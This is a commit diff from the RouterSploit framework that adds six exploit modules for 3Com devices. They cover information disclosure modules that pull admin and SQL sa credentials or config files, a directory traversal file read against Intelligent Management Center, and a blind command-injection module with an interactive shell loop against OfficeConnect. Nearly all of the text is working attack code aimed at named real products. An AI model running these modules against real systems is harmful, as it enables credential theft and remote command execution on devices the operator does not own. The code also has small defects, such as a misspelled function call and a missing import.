Adding multiple 3com exploits.

2d96822b · Marcin Bury · 764084bb · 2d96822b · 2d96822b · 2d96822b
Commit 2d96822b authored May 31, 2016 by Marcin Bury
7 changed files
--- a/routersploit/modules/exploits/3com/3cradsl72_info_disclosure.py
+++ b/routersploit/modules/exploits/3com/3cradsl72_info_disclosure.py
+from routersploit import (
+    exploits,
+    print_status,
+    print_error,
+    print_info,
+    print_success,
+    http_request,
+    mute,
+    validators,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for 3Com 3CRADSL72 Information Disclosure vulnerability.
+    If the target is vulnerable it allows to read sensitive information.
+    """
+    __info__ = {
+        'name': '3Com 3CRADSL72 Info Disclosure',
+        'description': 'Exploits 3Com 3CRADSL72 information disclosure vulnerability that allows to fetch credentials for SQL sa account',
+        'authors': [
+            'Karb0nOxyde <karb0noxyde[at]gmail.com>',  # vulnerability discovery
+            'Ivan Casado Ruiz <casadoi[at]yahoo.co.uk>',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            'http://lostmon.blogspot.com/2005/04/3com-adsl-11g-cradsl72-router.html',
+            'http://www.securityfocus.com/bid/11408/exploit',
+        ],
+        'devices': [
+             '3Com 3CRADSL72',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    port = exploits.Option(80, 'Target port')  # default port
+
+    resources = ["/app_sta.stm",
+                 "/cgi-bin/config.bin"]
+
+    def run(self):
+        for resource in self.resources:
+            url = "{}:{}{}".format(self.target, self.port, resource)
+
+            print_status("Sending request to download sensitive information")
+            response = http_request(method="GET", url=url)
+            if response is None:
+                return
+
+            if response.status_code == 200 and "password" in response.text:
+                print_succcess("Exploit success")
+                print_status("Reading {} file".format(resource))
+                print_info(response.text)
+            else:
+                print_error("Exploit failed - could not retrieve response")
+
+    @mute
+    def check(self):
+        for resource in self.resources:
+            url = "{}:{}{}".format(self.target, self.port, resource)
+
+            response = http_request(method="GET", url=url)
+            if response is None:
+                return False  # target is not vulnerable
+
+            if response.status_code == 200 and "password" in response.text:
+                return True
+
+        return False  # target not vulnerable
--- a/routersploit/modules/exploits/3com/__init__.py
+++ b/routersploit/modules/exploits/3com/__init__.py
--- a/routersploit/modules/exploits/3com/ap8760_password_disclosure.py
+++ b/routersploit/modules/exploits/3com/ap8760_password_disclosure.py
+import re
+
+from routersploit import (
+    exploits,
+    print_status,
+    print_error,
+    print_info,
+    print_success,
+    print_table,
+    http_request,
+    mute,
+    validators,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for 3Com AP8760 Password Disclosure vulnerability.
+    If the target is vulnerable it is possible to fetch credentials for administration user.
+    """
+    __info__ = {
+        'name': '3Com AP8760 Password Disclosure',
+        'description': 'Exploits 3Com AP8760 password disclosure vulnerability. If the target is vulnerable it is possible to fetch credentials for administration user.',
+        'authors': [
+            'Richard Brain',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            'http://www.procheckup.com/procheckup-labs/pr07-40/',
+        ],
+        'devices': [
+             '3Com AP8760',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    port = exploits.Option(80, 'Target port')  # default port
+
+    def run(self):
+        creds = []
+        url = "{}:{}/s_brief.htm".format(self.target, self.port)
+
+        print_status("Sending payload request")
+        response = http_request(method="GET", url=url)
+        if response is None:
+            return
+
+        print_status("Extracting credentials")
+        username = re.findall('<input type="text" name="szUsername" size=16 value="(.+?)">', response.text)
+        password = re.findall('<input type="password" name="szPassword" size=16 maxlength="16" value="(.+?)">', response.text)
+            
+        if len(username) and len(password):
+            print_success("Exploit success")
+            creds.append((username[0], password[0]))
+            print_table(("Login", "Password"), *creds)
+        else:
+            print_error("Exploit failed - could not extract credentials")
+
+    @mute
+    def check(self):
+        url = "{}:{}/s_brief.htm".format(self.target, self.port)
+
+        response = http_request(method="GET", url=url)
+        if response is None:
+            return False  # target is not vulnerable
+
+        if "szUsername" in response.text and "szPassword" in response.text:
+            return True  # target is vulnerable
+
+        return False  # target not vulnerable
--- a/routersploit/modules/exploits/3com/imc_info_disclosure.py
+++ b/routersploit/modules/exploits/3com/imc_info_disclosure.py
+from routersploit import (
+    exploits,
+    print_status,
+    print_error,
+    print_info,
+    print_success,
+    http_request,
+    mute,
+    validators,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for 3Com Intelligent Management Center Information Disclosure vulnerability.
+    If the target is vulnerable it allows to read credentials for SQL sa account.
+    """
+    __info__ = {
+        'name': '3Com IMC Info Disclosure',
+        'description': 'Exploits 3Com Intelligent Management Center information disclosure vulnerability that allows to fetch credentials for SQL sa account',
+        'authors': [
+            'Richard Brain',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            'https://www.exploit-db.com/exploits/12680/',
+        ],
+        'devices': [
+             '3Com Intelligent Management Center',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    port = exploits.Option(8080, 'Target port')  # default port
+
+    resources = ["/imc/reportscript/sqlserver/deploypara.properties",
+                 "/rpt/reportscript/sqlserver/deploypara.properties",
+                 "/imc/reportscript/oracle/deploypara.properties"]
+
+    valid = None
+
+    def run(self):
+        if self.check():
+            print_success("Target seems to be vulnerable")
+            url = "{}:{}{}".format(self.target, self.port, self.valid)
+
+            print_status("Sending request to download sensitive information")
+            response = http_request(method="GET", url=url)
+            if response is None:
+                return
+
+            if response.status_code == 200 and len(response.text):
+                print_status("Reading {}".format(self.valid))
+                print_info(response.text)
+            else:
+                print_error("Exploit failed - could not retrieve response")
+
+        else:
+            print_error("Exploit failed - target seems to be not vulnerable")
+
+    @mute
+    def check(self):
+        for resource in self.resources:
+            url = "{}:{}{}".format(self.target, self.port, resource)
+
+            response = http_request(method="GET", url=url)
+            if response is None:
+                continue
+
+            if any(map(lambda x: x in response.text, ["report.db.server.name", "report.db.server.sa.pass", "report.db.server.user.pass"])):
+                self.valid = resource
+                return True  # target is vulnerable
+
+        return False  # target not vulnerable
--- a/routersploit/modules/exploits/3com/imc_path_traversal.py
+++ b/routersploit/modules/exploits/3com/imc_path_traversal.py
+from routersploit import (
+    exploits,
+    print_status,
+    print_error,
+    print_info,
+    print_success,
+    http_request,
+    mute,
+    validators,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for 3Com Intelligent Management Center Path Traversal vulnerability.
+    If the target is vulnerable it is possible to read file from the filesystem.
+    """
+    __info__ = {
+        'name': '3Com IMC Path Traversal',
+        'description': 'Exploits 3Com Intelligent Management Center path traversal vulnerability. If the target is vulnerable it is possible to read file from the filesystem.',
+        'authors': [
+            'Richard Brain',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            'https://www.exploit-db.com/exploits/12679/',
+        ],
+        'devices': [
+             '3Com Intelligent Management Center',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    port = exploits.Option(8080, 'Target port')  # default port
+    filename = exploits.Option('\\windows\\win.ini', 'File to read from the filesystem')
+
+
+    def run(self):
+        if self.check():
+            print_success("Target seems to be vulnerable")
+            url = "{}:{}/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..{}".format(self.target, self.port, self.filename)
+
+            print_status("Sending paylaod request")
+            response = http_request(method="GET", url=url)
+            if response is None:
+                return
+
+            if response.status_code == 200 and len(response.text):
+                print_success("Exploit success - reading {} file".format(self.filename))
+                print_info(response.text)
+        else:
+            print_error("Exploit failed - target seems to be not vulnerable")
+
+    @mute
+    def check(self):
+        url = "{}:{}/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..\windows\win.ini".format(self.target, self.port)
+
+        response = http_request(method="GET", url=url)
+        if response is None:
+            return False  # target is not vulnerable
+
+        if response.status_code == 200 and len(response.text):
+            return True  # target is vulnerable
+
+        return False  # target not vulnerable
--- a/routersploit/modules/exploits/3com/officeconnect_info_disclosure.py
+++ b/routersploit/modules/exploits/3com/officeconnect_info_disclosure.py
+from routersploit import (
+    exploits,
+    print_status,
+    print_error,
+    print_info,
+    print_success,
+    http_request,
+    mute,
+    validators,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for 3Com OfficeConnect Information Disclosure vulnerability.
+    If the target is vulnerable it is possible to read sensitive information.
+    """
+    __info__ = {
+        'name': '3Com OfficeConnect Info Disclosure',
+        'description': 'Exploits 3Com OfficeConnect information disclosure vulnerability. If the target is vulnerable it is possible to read sensitive information.',
+        'authors': [
+            'Luca Carettoni <luca.carettoni[at]ikkisoft.com>',  # vulnerablity discovery
+            'iDefense',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            'http://old.sebug.net/paper/Exploits-Archives/2009-exploits/0902-exploits/LC-2008-05.txt',
+            'http://seclists.org/vulnwatch/2005/q1/42',
+        ],
+        'devices': [
+             '3Com OfficeConnect',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    port = exploits.Option(80, 'Target port')  # default port
+
+    resources = ["/SaveCfgFile.cgi",
+                 "/main/config.bin",
+                 "/main/profile.wlp?PN=ggg",
+                 "/main/event.logs"]
+
+    valid = None
+
+    def run(self):
+        if self.check():
+            url = "{}:{}{}".format(self.target, self.port, self.valid)
+
+            print_status("Sending payload request")
+            response = http_request(method="GET", url=url)
+            if response is None:
+                return
+
+            if response.status_code == 200 and len(response.text):
+                print_success("Exploit success")
+                print_info(response.text)
+        else:
+            print_error("Exploit failed - target seems to be not vulnerable")
+
+    @mute
+    def check(self):
+        for resource in self.resources:    
+            url = "{}:{}{}".format(self.target, self.port, resource)
+
+            response = http_request(method="GET", url=url)
+            if response is None:
+                return False  # target is not vulnerable
+		
+            if "pppoe_username" in response.text and "pppoe_password" in response.text:
+                self.valid = resource
+                return True  # target is vulnerable
+
+        return False  # target not vulnerable
--- a/routersploit/modules/exploits/3com/officeconnect_rce.py
+++ b/routersploit/modules/exploits/3com/officeconnect_rce.py
+from routersploit import (
+    exploits,
+    print_success,
+    print_status,
+    print_error,
+    http_request,
+    random_text,
+    mute,
+    validators,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for 3Com OfficeConnect Remote Command Execution vulnerability.
+    If the target is vulnerable, command loop is invoked.
+    """
+    __info__ = {
+        'name': '3Com OfficeConnect RCE',
+        'authors': [
+            'Andrea Fabizi',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'description': 'Module exploits 3Com OfficeConnect remote command execution vulnerability which allows executing command on operating system level.',
+        'references': [
+            'https://www.exploit-db.com/exploits/9862/',
+        ],
+        'devices': [
+             '3Com OfficeConnect',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
+    port = exploits.Option(80, 'Target Port')
+
+    def run(self):
+        if self.check():
+            print_success("Target is vulnerable")
+            print_status("Invoking command loop...")
+            print_status("It is blind command injection - response is not available")
+            self.command_loop()
+        else:
+            print_error("Target is not vulnerable")
+
+    def command_loop(self):
+        while 1:
+            cmd = raw_input("cmd > ")
+
+            if cmd in ['exit', 'quit']:
+                return
+
+            print_info(self.execute(cmd))
+
+    def execute(self, cmd):
+        url = "{}:{}/utility.cgi?testType=1&IP=aaa || {}".format(self.target, self.port, cmd)
+
+        response = http_request(method="GET", url=url)
+        if response is None:
+            return ""
+
+        return response.text
+
+    @mute
+    def check(self):
+        url = "{}:{}/utility.cgi?testType=1&IP=aaa".format(self.target, self.port)
+
+        response = http_request(method="GET", url=url)
+        if response is None:
+            return False  # target is not vulnerable
+
+        if response.status_code == 200:
+            return True  # target is vulnerable
+
+        return False  # target is not vulnerable